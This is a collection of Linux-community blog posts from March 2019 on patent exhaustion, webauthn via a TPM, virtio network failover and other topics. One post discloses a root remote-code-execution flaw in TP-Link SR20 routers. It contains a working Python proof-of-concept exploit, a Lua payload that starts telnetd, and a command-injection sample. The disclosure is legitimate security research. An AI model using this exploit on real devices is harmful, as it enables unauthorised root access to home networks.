Firstly, it’s important to note that the exhaustion arguments above have no impact on the patentability of software or the validity of software patents in general, just on their enforcement. Secondly, exhaustion is triggered by the unencumbered right to redistribute which is present in all Open Source licences. However, proprietary software doesn’t come with a right to redistribute in the copyright licence, meaning exhaustion likely doesn’t trigger for them. Thus the exhaustion arguments above have no real impact on the ability to enforce software patents in proprietary code except that one possible defence that could be raised is that the code practising the patent in the proprietary software was, in fact, legitimately obtained from an open source project under a permissive licence and thus the patent has exhausted. The solution, obviously, is that if you worry about enforceability of patents in proprietary software, always use a copyleft licence for your open source.

What about the Patent Troll Problem?

Trolls, by their nature, are not IP producing entities, thus they are not ecosystem participants. Therefore trolls, being outside the community, can pursue infringement cases unburdened by exhaustion problems. In theory, this is partially true but Trolls don’t produce anything, therefore they have to acquire their patents from someone who does. That means that if the producer from whom the troll acquired the patent was active in the community, the patent has still likely exhausted. Since the life of a patent is roughly 20 years and mass adoption of open source throughout the software industry is only really 10 years old, there still may exist patents owned by Trolls that came from corporations before they began to be Open Source players and thus might not be exhausted.

The hope this offers for the Troll problem is that in 10 years time, all these unexhausted patents will have expired and thanks to the onward and upward adoption of open source there really will be no place for Trolls to acquire unexhausted patents to use against the software industry, so the Troll threat is time limited.

A Call to Arms: Realising the Elimination of Patents in Open Source

Your mission, should you choose to be part of this project, is to help advance the legal doctrines on patent exhaustion. In particular, if the company you work for is sued for patent infringement in any Open Source project, even by a troll, suggest they look into asserting an exhaustion based defence. Even if your company isn’t currently under threat of litigation, simply raising awareness of the option of exhaustion can help enormously.

The first case in which an exhaustion defence could potentially be tried is this one: Sequoia Technology is asserting a patent against LVM in the Linux kernel. However, it turns out that patent 6,718,436 is actually assigned to ETRI, who merely licensed it to Sequoia for the purposes of litigation. ETRI, by the way, is a Linux Foundation member but, more importantly, in 2007 ETRI launched their own distribution of Linux called Booyo, which would appear to be evidence that their own actions as a distributor of the Linux kernel exhausted patent 6,718,436 in Linux long before they ever licensed it to Sequoia.

If we get this right, in 10 years the Patent threat in Open Source could be history, which would be a nice little legacy to leave our children.

March 30, 2019 09:32 PM

March 29, 2019

Pete Zaitcev: Swift(stack) bragging today

On their official blog:

Over the last several months, SwiftStack has been busy helping two large autonomous vehicle customers. These data pipelines are distributed across edge (vehicle sensors) to core (data center) to cloud/multi-cloud locations, and are challenged with ingest, labeling, training, inferencing, and retaining data at scale. [...] one deployment is handling more than a petabyte of data per week, with four thousand GPU cores from NVIDIA DGX-1 servers fed with 100 GB/s of throughput from SwiftStack cluster.

I suspect the task-queue expirer could be helpful at this. Although, if you're uploading 1 PB per week, it takes about a year to fill out a cluster as big as Turkcell's.

Apparently the actual storage is provided by Cisco UCS S3260. Some of our customers use Cisco UCS to run Swift too. I always thought of Cisco as a networking company, but it’s different nowadays.

March 29, 2019 03:54 AM

Daniel Vetter: X.org Elections: freedesktop.org Merger - Vote Now!

Aside from the regular board elections we also have some bylaw changes to vote on. As usual with bylaw changes, we need a supermajority of all members to agree - if you don’t vote you essentially reject it, but the board has no way of knowing.

Please see the detailed changes of the bylaws, make up your mind, and go voting on the shiny new members page.

March 29, 2019 12:00 AM

March 28, 2019

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.
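
For anyone unfamiliar with why popen() is such a red flag, here’s a contrived sketch (mine, not TP-Link’s code) of the failure mode:

#include <stdio.h>

/* Contrived illustration of why an imported popen() is a red flag:
 * the command string is handed to /bin/sh, so any user-controlled
 * text in it becomes shell command injection. */
int main(void)
{
    const char *user_input = "eth0; touch /tmp/pwned"; /* attacker controlled */
    char cmd[256];
    snprintf(cmd, sizeof(cmd), "ifconfig %s", user_input);
    /* actually runs: sh -c "ifconfig eth0; touch /tmp/pwned" */
    FILE *p = popen(cmd, "r");
    if (p)
        pclose(p);
    return 0;
}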

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:

int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64];
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}
Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:

Proof of concept:
#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
import sys
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = response.hex()
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch


March 28, 2019 10:18 PM

March 23, 2019

James Bottomley: Webauthn in Linux with a TPM via the HID gadget

Account security on the modern web is a bit of a nightmare. Everyone understands the need for strong passwords which are different for each account, but managing them is problematic because the human mind just can’t remember hundreds of complete gibberish words, so everyone uses a password manager (which, let’s admit it, for a lot of people means writing them down). A solution to this problem has long been something called two factor authentication (2FA), which authenticates you by something you know (like a password) and something you possess (like a TPM or a USB token). The problem has always been that you ideally need a different 2FA for each website, so that a compromise of one website doesn’t lead to the compromise of all your accounts.

Enter webauthn. This is designed as a 2FA protocol that uses public key cryptography instead of shared secrets and also uses a different public/private key pair for each website, thus aspiring to be a passwordless, secure, scalable 2FA system for the web. However, the webauthn standard only specifies how the protocol works when the browser communicates with the remote website; there’s a different standard called FIDO or U2F that specifies how the browser communicates with the second factor (called an authenticator in FIDO speak) and how that second factor works.

It turns out that the FIDO standards do specify a TPM as one possible backend, so what, you might ask does this have to do with the Linux Gadget subsystem? The answer, it turns out, is that although the standards do recommend a TPM as the second factor, they don’t specify how to connect to one. The only connection protocols in the Client To Authenticator Protocol (CTAP) specifications are USB, BLE and NFC. And, in fact, the only one that’s really widely implemented in browsers is USB, so if you want to connect your laptop’s TPM to a browser it’s going to have to go over USB meaning you need a Linux USB gadget. Conspiracy theorists will obviously notice that if the main current connector is USB and FIDO requires new USB tokens because it’s a new standard then webauthn is a boon to token manufacturers.

How does Webauthn Work?

The protocol comes in two flavours, version 1 and version 2. Version 1 is fixed cryptography and version 2 is agile cryptography. However, version 1 is simpler, so that’s the one I’ll explain.

Webauthn essentially consists of two phases: a registration phase where the authenticator is tied to the account, which often happens when the remote account is created, and authentication where the authenticator is used to log in again to the website after registration. Obviously accounts often outlive the second factor, especially if it’s tied to a machine like the TPM, so the standard contemplates a single account having multiple registered authenticators.

The registration request consists of a random challenge supplied by the remote website to prevent replay and an application id which is constructed by the browser from the website supplied ID and the web origin of the site. The design is that the application ID should be unique for each remote account and not subject to being faked by the remote site to trick you into giving up some other application’s credentials.

The authenticator’s response consists of a unique public key, an opaque key handle, an attestation X.509 certificate containing a public key, and a signature over the challenge, the application ID, the public key and the key handle using the private key of the certificate. The remote website can verify this signature against the certificate to verify registration. Additionally, Google recommends that the website also verify the attestation certificate against a list of known device master certificates to prove it is talking to a genuine U2F authenticator. Since no-one is currently maintaining a database of “genuine” second factor master certificates, this last step mostly isn’t done today.

In version 1, the only key scheme allowed is Elliptic Curve over the NIST P-256 curve. This means that the public key is always 65 bytes long and an encrypted (or wrapped) form of the private key can be stashed inside the opaque key handle, which may be a maximum of 255 bytes. Since the key handle must be presented for each authentication attempt, it relieves the second factor from having to remember an ever increasing list of public/private key pairs, because all it needs to do is unwrap the private key from the opaque handle, perform the signature and then forget the unwrapped private key. Note that this means that, per authenticator registered to a user account, the remote website must store the public key and the key handle, about 300 bytes extra, but that’s peanuts compared to the amount of information remote websites usually store per registered account.
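
For the byte-minded, here is a sketch of the registration response layout per my reading of the FIDO U2F raw message format; the trailing fields are variable length, so only the fixed prefix fits in a C struct:

#include <stdint.h>

/* Sketch of the version 1 (U2F) registration response wire layout:
 *
 *   [0]      0x05 reserved byte
 *   [1..65]  user public key: uncompressed NIST P-256 point (0x04 || X || Y)
 *   [66]     key handle length L
 *   [67..]   opaque key handle (L bytes, typically the wrapped private key)
 *   then     attestation certificate (DER-encoded X.509)
 *   then     ECDSA signature over 0x00 | application parameter |
 *            challenge parameter | key handle | user public key
 */
struct u2f_register_resp_prefix {
    uint8_t reserved;   /* always 0x05 */
    uint8_t pubkey[65]; /* the unique per-registration public key */
    uint8_t kh_len;     /* key handle length, max 255 */
    /* key handle, certificate and signature follow */
} __attribute__((packed));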

To perform an authentication the remote website presents a unique challenge, the raw ID from which the browser should construct the same application ID, and the key handle. Ideally the authenticator should verify that the application ID matches the one used for registration (so it should be part of the wrapped key handle) and then perform a signature over the application ID, the challenge and a unique monotonically increasing counter number which is sent back in the response. To validly authenticate, the remote website verifies the signature is genuine and that the count has increased since the last authentication (so it has to store the per-authenticator 4 byte count as well). Any increase is fine, so each second factor only needs to maintain a single monotonically increasing counter to use for every registered site.
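
Likewise, a sketch of the data the authenticator signs for an authentication request, again per my reading of the U2F raw message format:

#include <stdint.h>

/* Sketch of the data signed in a version 1 authentication response.
 * The response itself carries the user-presence byte, the 4-byte
 * counter and the signature; hashes are SHA-256. */
struct u2f_auth_sign_base {
    uint8_t app_param[32];  /* SHA-256 of the application ID */
    uint8_t user_presence;  /* 0x01 when the user confirmed presence */
    uint8_t counter[4];     /* monotonically increasing, big-endian */
    uint8_t chal_param[32]; /* SHA-256 of the client data (challenge) */
} __attribute__((packed));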

Problems with Webauthn and the TPM

The primary problem is the attestation certificate, which is actually an issue for the whole protocol. TPMs are actually designed to do attestation correctly, which means providing proof of being a genuine TPM without compromising the user’s privacy. The way they do this is via a somewhat complex attestation protocol involving a privacy CA. The problem they’re seeking to avoid is that if you present the same certificate every time you use the device for registration you can be tracked via that certificate and your privacy is compromised. The way the TPM gets around this is that you can use a privacy CA to produce an arbitrary number of different certificates for the same TPM and you could present a new one every time, thus leaving nothing to be tracked by.

The ability to track users by certificate has been a criticism levelled at FIDO and the best the alliance can come up with is the idea that perhaps you batch the attestation certificates, so the same certificate is used in hundreds of new keys.

The problem for TPMs though is that until FIDO devices use proper privacy CA based attestation, the best you can do is generate a separate self signed attestation certificate. The reason is that the TPM does contain its own certificate, but it’s encryption only, not signing because of the way the TPM privacy CA based attestation works. Thus, even if you were willing to give up your privacy you can’t use the TPM EK certificate as the FIDO attestation certificate. Plus, if Google carries out its threat to verify attestation certificates, this scheme is no longer going to work.

Aside about Browsers and CTAP

The crypto aware among you will recognise that there is already a library based standard that can be used to talk to a variety of USB tokens and even the TPM called PKCS#11. Mozilla Firefox, for instance, already supports using this as I demonstrated in a previous blog post. One might think, based on what I said about the one token per key problem in the introduction, that PKCS#11 can’t support the new key wrapping based aspect of FIDO but, in fact, it can via the C_WrapKey/C_UnwrapKey API. The only thing PKCS#11 can’t do is the new monotonic counter.

Even if PKCS#11 can’t perform all the necessary functions, what about a new or extended library based protocol? This is a good question to which I’ve been unable to get a satisfactory answer. Certainly doing CTAP correctly requires that your browser be able to speak directly to the USB, Bluetooth and NFC subsystems. Perhaps not too hard for a single platform browser like Internet Explorer, but fraught with platform complexity for generic browsers like Firefox, where the only solution is to have a rust based accessor for every supported platform.

Certainly the lack of a library interface is where the TPM issues come from, because without one we have to plug the TPM based FIDO layer into the browser over an existing CTAP protocol it supports, i.e. USB. Fortunately Linux has the USB Gadget subsystem, which fits the bill precisely.

Building Synthetic HID Devices with USB Gadget

Before you try this at home, I should point out that the Linux HID Gadget has a longstanding bug that will cause your machine to hang unless you have this patch applied. You have been warned!

The HID subsystem is for driving Human Interface Devices, meaning keyboards and mice. However, it has a simple packet (called a report in USB speak) based protocol which is easy for most things to use. In order to facilitate this, Linux actually provides hidraw devices which allow you to send and receive these reports using read and write system calls (which, in fact, is how Firefox on Linux speaks CTAP). What the hid gadget does when set up is provide all the static emulation of HID device protocols (like discovery pages) while allowing you to send and receive the hidraw packets over the /dev/hidgX device tap, also via read and write (essentially operating like a tty/pty pair). To get the whole thing running, the final piece of the puzzle is that the browser (most likely running as you) needs to be able to speak to the hidraw device, so you need a udev rule to make it accessible, because by default hidraw devices are mode 0600. Since the same goes for every other USB security token, you’ll find a template in the same rpm that installs the PKCS#11 library for the token.
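For reference, such a rule is a one liner. The following is purely illustrative: the vendor and product IDs are placeholders for your token’s, and TAG+="uaccess" is the systemd-logind mechanism for granting the console user access.

KERNEL=="hidraw*", ATTRS{idVendor}=="1209", ATTRS{idProduct}=="0001", TAG+="uaccess"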

The way CTAP works is that every transaction is split into 64 byte reports and sent over the hidraw interface. All you need to do to get this setup is initialise a report descriptor for this type of device. Since it’s somewhat cumbersome to do, I’ve created this script to do it (run it as root). Once you have this, the hidraw and hidg devices will appear (make them both user accessible with chmod 666) and then all you need is a programme to drive the hidg device and you’re done.
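For the curious, here is a condensed sketch of what such a setup script does through the USB gadget configfs interface, assuming the dummy_hcd software UDC and with the actual report descriptor bytes elided (the IDs and file names are illustrative):

modprobe dummy_hcd                     # software UDC, no real gadget hardware needed
cd /sys/kernel/config/usb_gadget
mkdir fido && cd fido
echo 0x1209 > idVendor                 # placeholder IDs
echo 0x0001 > idProduct
mkdir -p strings/0x409 configs/c.1 functions/hid.usb0
echo "Software FIDO token" > strings/0x409/product
echo 64 > functions/hid.usb0/report_length    # CTAP uses 64 byte reports
cat ctap_report_desc.bin > functions/hid.usb0/report_desc   # descriptor elided
ln -s functions/hid.usb0 configs/c.1
ls /sys/class/udc                      # find the UDC name
echo dummy_udc.0 > UDC                 # bind the gadget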

A TPM Based Hid Gadget Driver

Note: this section is written describing TPM 2.0.

The first thing we need out of the TPM is a monotonic counter; fortunately all TPMs have NV counter indexes which can be created (all TPM counters are 8 bytes, whereas the CTAP protocol requires 4, so we simply chop off the top 4 bytes). By convention I create the counter at NV index 01000101. Once created, this counter is persistent and monotonic for the lifetime of the TPM.
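If you want to play with such a counter by hand, the tpm2-tools suite can drive it. The sketch below is assumption laden: the attribute spelling in particular has changed between tpm2-tools releases, so consult your version’s tpm2_nvdefine man page.

tpm2_nvdefine 0x01000101 -C o -s 8 -a "ownerread|ownerwrite|nt=counter"
tpm2_nvincrement 0x01000101 -C o    # a fresh counter must be incremented before first read
tpm2_nvread 0x01000101 -C o -s 8    # returns the 8 byte big-endian count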

The next thing you need is an attestation certificate and key. These must be NIST P-256 based, but it’s easy to get openssl to create them:

openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:prime256v1 -pkeyopt ec_param_enc:named_curve -out reg_key.key

openssl req -new -x509 -subj '/CN=My Fido Token/' -key reg_key.key -out reg_key.der -outform DER

This creates a self signed certificate, but you could also create a certificate chain this way.

Finally, we need the TPM to generate one NIST P-256 key pair per registration. Here we use the TPM2_Create() call, which gets the TPM to create a random asymmetric key pair and return the public and wrapped private pieces. We can simply bundle these up and return them as the key handle (fortunately, what the TPM spits back for a NIST P-256 key is about 190 bytes when properly marshalled). When the remote end requests an authentication, we extract the TPM key from the key handle, use TPM2_Load to place it in the TPM, sign the hash and then unload the key from the TPM. Putting this all together, this project (which is highly experimental) provides the script to create the devices and a hidg driver that interfaces to the TPM. All you need to do is run it as

hidgd /dev/hidg0 reg_key.der reg_key.key

And you’re good to go. If you want to test it, there are plenty of public domain webauthn test sites; webauthn.org and webauthn.io are two I’ve tested as working.
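If you want to poke at the underlying key flow without the gadget in the middle, the same TPM operations can be approximated with tpm2-tools (a sketch only; option spellings vary between releases):

tpm2_createprimary -C o -c primary.ctx                        # storage parent
tpm2_create -C primary.ctx -G ecc256 -u key.pub -r key.priv   # per-registration key pair
# key.pub plus key.priv together play the role of the opaque key handle
tpm2_load -C primary.ctx -u key.pub -r key.priv -c key.ctx    # "unwrap" at authentication
tpm2_sign -c key.ctx -g sha256 -o sig.bin challenge.bin       # sign, then forget the key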

TODO Items

The webauthn standard specifies the USB authenticator should ask for permission before performing either registration or authentication. Currently the TPM hid gadget doesn’t have any external verification, but in future I’ll add a configurable pinentry to add confirmation and possibly also a single password for verification.

The current code also does nothing to verify the application ID on a per-authorization basis. This is a security problem because you are currently vulnerable to being spoofed by malicious websites which could hand you a snooped key handle and then use the resulting signature to fake your login to a different site. To avoid this, I’m planning to use the policy area of the TPM key to hold the application ID. This should work because the generated keys have no authorization, either policy or password, so the policy area is effectively redundant. It is in the unwrapped public key, but if any part of the public key is tampered with, the TPM will detect this via a hash in the wrapped private key and give a binding error on load.

The current code really only does version 1 of the FIDO protocol. Ideally it needs upgrading to version 2. However, there’s not really much point because for all the crypto agility, most TPMs on the market today can only do NIST P-256 curves, so you wouldn’t gain that much.

Conclusions

Using this scheme you’re ready to play with FIDO/U2F as long as you have a laptop with a functional TPM 2.0 and a working USB gadget subsystem. If you want to play, please remember to make sure you have the gadget patch applied.

March 23, 2019 09:58 PM

March 17, 2019

Michael S. Tsirkin:

Virtio Network Device Failover


Support for Virtio Network Device Failover, which was merged for Linux 4.17, presents an interesting study in interface design, both for operating systems and for hypervisors. Read on for an article examining the problem domain and the solution space, and describing the current status of the implementation.


PT versus PV NIC

Imagine a Virtual Machine running on a hypervisor on a host computer. The hypervisor has access to a network to which the host is attached, but how should the guest gain this access? The answer could depend on the type of the network and on the network interface on the host. For the sake of this article we focus on Ethernet networks and NICs. In this setup a popular solution extends (bridges) the Ethernet network into the guest by exposing a virtual Ethernet device as part of the VM.

In most setups a single host NIC would be shared between VMs. Two popular configurations are shown below:

[Figure: VM network configuration]

In the first diagram (on the left) the NIC exposes Virtual Function (VF) interfaces which the hypervisor “passes through” - makes accessible to the guests. Using such Passthrough (PT) interfaces, packets can pass between the guest and the NIC directly. For PCI devices, device memory can actually be mapped into the address space of the virtual machine in such a way that the guest can access the device without invoking the hypervisor. In the setup on the right, packets are passed between the guest and the NIC by the hypervisor. The hypervisor interface used by the guest for this purpose would commonly be a PV - Para-virtual (i.e. designed for the hypervisor) - NIC. One example would be the Virtio network device, used for example with the KVM hypervisor. By comparison, Microsoft HyperV guests use the netvsc device with its PV NICs.

Since the underlying packets are still handled by the physical NIC in both cases, it would be unusual for the second (PV) setup to outperform the first (PT) one. Besides removing some of the hypervisor overhead, passthrough allows the driver within the guest to be precisely tuned to the physical device.

However the PV NIC setup obviously offers more flexibility - for example, the hypervisor can implement an arbitrary filtering policy for the networking packets. By comparison, with PT NICs we are limited to the features presented by the hardware NICs, which are often more limited: some of them have only the simplest filtering capabilities. As an example of a simple and effective filtering/security measure, the guest would often be prevented from modifying the MAC address of its devices, limiting the guest’s access to the host’s network.

But even beyond the limitations of specific hardware, the standardized interface independent of the physical NIC makes the system easier to manage: use of a standard driver within the guest, as well as a well known state of the device, enables features such as live migration of guests between hypervisors: guests can often be moved with negligible network downtime.

The same can not generally be said of the passthrough setup. For example, one of the issues encountered with it is that even a small difference between hypervisor hosts in their physical hardware would require expensive reconfiguration when switching hypervisors.

Can something not be done about performance, to get the speed benefits of pass-through without giving up on live migration and the other advantages of the standardized PV NIC setup? One approach could be designing a pass-through NIC around a standard paravirtualized interface. This is the approach taken by the Virtio Data Path Accelerator devices. In the absence of such an accelerator, Virtual Network Device Failover presents another possible approach.

Network device Failover basics

Conceptually, the idea behind Virtual Network Device Failover is simple: assume that a standard PV interface only brings benefits part of the time. The system would change its configuration accordingly: when migration is required, use the PV interface; when it’s not, use a PT device.

When possible, the hypervisor will pass the NIC through to the guest as a “primary” device. To reduce downtime, a “standby” PV device could be kept around at all times. When PV features are not required, the hypervisor can add guest access to the primary PT device; at other times the standby PV interface is used.

Accordingly, guest would be required to switch over between primary and standby interfaces depending on availability of the primary interface.

[Figure: network device failover basics]

An astute reader might notice that the above switching sounds a bit like the active-backup configuration of the bond and team network drivers in Linux. That is true - in fact in the past one of these drivers has often been used to implement network device failover. Let’s take a quick look at how active-backup can be used for network device failover.

Network Device Failover using active-backup

This text will use the term bond when meaning the network device created by either the bond or the team driver: the differences between these two mostly have to do with how devices are created, configured and destroyed, and will not be covered here.

A bond device is a master software network device which can enslave multiple interfaces. In our case these would be the standby and the primary devices. For this, the bond master needs to be created and initialized with the slave interface names before the slaves are brought up. When the priority of the primary interface is set higher than the priority of the standby, the bond will switch between the interfaces as required for failover.
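For illustration, this is roughly how such an active-backup bond could be assembled by hand with iproute2 (a sketch; the interface names are illustrative, and the primary option applies to active-backup mode):

ip link add bond0 type bond mode active-backup miimon 100
ip link set eth0 down && ip link set eth0 master bond0    # PT primary
ip link set eth1 down && ip link set eth1 master bond0    # PV standby
ip link set bond0 type bond primary eth0                  # prefer the PT device
ip link set bond0 up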

The active-backup mode was designed to help create redundancy and improve uptime for systems with multiple NIC devices. To make it work for the virtual machine, we need the guest to detect interface failure on the primary interface and switch to the standby one. This can be achieved, for example, by removing the interface: the hypervisor emulates a hotplug removal request.

However the above might already hint at some of the issues with this approach to failover: first, the bond needs to be set up by userspace. Configuring a bond for all devices unconditionally would be an option, but would add overhead for all users. On the other hand, adding a slave to the bond requires bringing the slave down. For this reason, to avoid downtime, the bond has to be created upfront, even if only the standby device is present during guest initialization.

Further, setting up an active-backup bond is considered a question of policy and thus is left up to the guest admin. By comparison, network failover is a mechanism: there’s no good reason not to use a PT interface if it is available to the guest. Should the hypervisor want to force the guest to create a bond, the hypervisor would need a measure of control over the guest network configuration, which might conflict with the way some guest admins like to set up their networking.

Another issue is with device selection. Bond tends to address devices using their names. While device names under many Linux distributions have recently become more predictable, this is not the case for all distributions, and specific naming schemes might differ. It is thus a challenge for the hypervisor to specify to the guest which interfaces need to be bonded together.

To help reduce downtime, the bond will also broadcast location information on the network on every switchover. This is not too problematic, but might cause extra load on the network - likely unnecessary in the case of virtual device failover, since packets are in the end traveling over the same physical wire.

Maintaining a consistent MAC address for the guest is necessary to avoid the need for all the guest’s neighbours to rediscover the MAC address using the slow ARP/Neighbour Discovery process. To help with that, the bond will try to program the MAC address into the primary device when it’s attached. If MAC programming is disabled as a security measure (as described above), the bond will generally fail to attach to this slave.

Failover goals; 1, 2 and 3 device models

The goal of the network device failover support in Linux is to address the above problems. Specifically:
- PT cards with MAC programming disabled need to be supported
- configuration should happen automatically, with no need for userspace to make a policy decision
- in particular, the primary/standby pair of devices should be selected with no need for special configuration to be passed from the hypervisor
- support as wide a range of existing network setup tools as possible, with minimal changes

Most of the design seems to fall out from the above goals in a manner that is more or less straight-forward:
- the design supports two devices: a standby PV device is present at all times and used by default; a primary PT device is used by preference when it’s available
- failover support is initialized by the PV device driver; e.g. in the case of Virtio this happens when the Virtio-net driver detects a special feature bit set by the hypervisor on the Virtio PV device
- to support devices without MAC programming, both standby and primary can simply be required to be initialized (e.g. by the hypervisor) with the same MAC address; in that case, the MAC address can also be used by failover to locate and enslave the primary device

However, the requirement to minimize userspace changes caused a certain amount of debate about the best way to model the failover setup, with the debate centered around the number of network device structures being created and exposed to userspace. It seems worthwhile to list the options that have been debated, below:

1-device model

In a 1-device model userspace sees a single failover device at all times. At any time this device would be either the PT or the PV device. As userspace might need to configure devices differently depending on the specific driver used, a new interface would have to be introduced for the kernel to report driver changes to userspace, and for userspace to detect the actual driver used. However, as long as userspace does not contain any driver-specific code, userspace tools that already work with the Virtio device seem to be guaranteed to keep working without any changes, but with better performance.

To the best of the author’s knowledge, no actual code supporting this mode has ever been posted.

2-device model

In a 2-device model, the standby and primary devices are exposed to userspace as two network devices. The devices aren’t independent: the primary device is a slave and the standby is the master, in that when the primary is present, the standby device forwards outgoing packets for transmission on the primary device.

PT driver discovery and device specific configuration can happen on the slave interface using standard device discovery interfaces.

Both portable configuration affecting both PV and PT devices (such as interface MTU) and the configuration that is specific to the PV device will happen on the master interface.

The 2-device model is used by the netvsc driver in Linux. It has been used in production for a number of years with no significant issues reported. However, it diverges from the model used by the bond driver, and the combination of PV-specific and portable configuration on the master device was seen by some developers as confusing.

3-device model

The 3-device model basically follows bond: a master failover device forwards packets to either the primary or the standby slaves, depending on the primary’s availability.

The failover device maintains the portable configuration, while the primary and standby can each have their own driver-specific configuration.

This model is used by the net_failover driver, which has been present in Linux since version 4.17. This model isn’t transparent to userspace: for example, the presence of at least two devices (failover master and primary slave) at all times seems to confuse some userspace tools such as dracut, udev, initramfs-tools and cloud-init. Most of these tools have since been updated to check the slave flag of each interface and ignore interfaces where it is set.
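The check those tools now perform amounts to something like the following shell sketch: the kernel reports enslaved interfaces with the SLAVE flag in the ip link output.

for dev in $(ls /sys/class/net); do
    if ip link show dev "$dev" | head -1 | grep -q SLAVE; then
        continue    # enslaved to a failover/bond master; leave it alone
    fi
    echo "would configure $dev"
done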

3-device model with hidden slaves

It is possible that the compatibility of the 3-device model with existing userspace can be improved by somehow hiding the slave devices from most legacy userspace tools, unless they explicitly ask for them.

For example it could be possible to somehow move them to some kind of special network namespace. No patches to implement this idea have been posted so far.

Hypervisor failover support

At the time of this article’s writing, support for virtual network device failover in the QEMU/KVM hypervisor is still being worked on. This work has uncovered a surprising number of subtle issues, some of which are covered below.

Primary device availability

The network failover driver relies on hotplug events for primary device availability. In other words, to make the primary device available to the guest, the hypervisor emulates a hot-add hotplug event on a bus within the VM (e.g. the virtual PCI bus). To make the primary device unavailable, a hot-unplug event is emulated.

Note that at the moment most PCI drivers expect a chance to be notified and to execute cleanup before a device is removed. From the hypervisor’s point of view, this means that it can not remove the PT device, and e.g. can not initiate migration, until it receives a response from the guest. Making the hypervisor depend on the guest being responsive in this way is problematic, e.g. from a security point of view.

As described in an lwn.net article, most drivers do not at the moment support surprise removal well. When that is addressed, hypervisors will be able to switch to emulating surprise removal, removing the dependency on guest responsiveness.

Existing Guest compatibility

One of the issues that hypervisors take pains to handle well is compatibility with existing guests, that is, guests which have not been modified to support virtual network device failover.

One possible issue is that existing guests can become confused if they detect two Ethernet devices with the same MAC address.

To help address this issue, the hypervisor can defer making the primary device visible to the guest until after the PV driver has been initialized. The PV driver can signal to the hypervisor that the guest supports virtual network device failover.

For example, in the case of the virtio-net driver, the hypervisor can signal failover support to the guest by setting the VIRTIO_NET_F_STANDBY host feature bit on the Virtio device. If failover is enabled, the driver can signal failover support to the hypervisor by setting the matching VIRTIO_NET_F_STANDBY guest feature bit on the device.

After detecting a modern guest with failover support, the hypervisor can hot-add the primary device. The device will have to be hot-removed again on guest reset, in case the VM reboots into a legacy guest without failover support.

This is also helpful to avoid initializing a useless failover device on hypervisors without actual failover support.

As of the time of writing of this article, the definition of the VIRTIO_NET_F_STANDBY and its support are present in Linux. Some preliminary hypervisor patches with known issues have been posted.
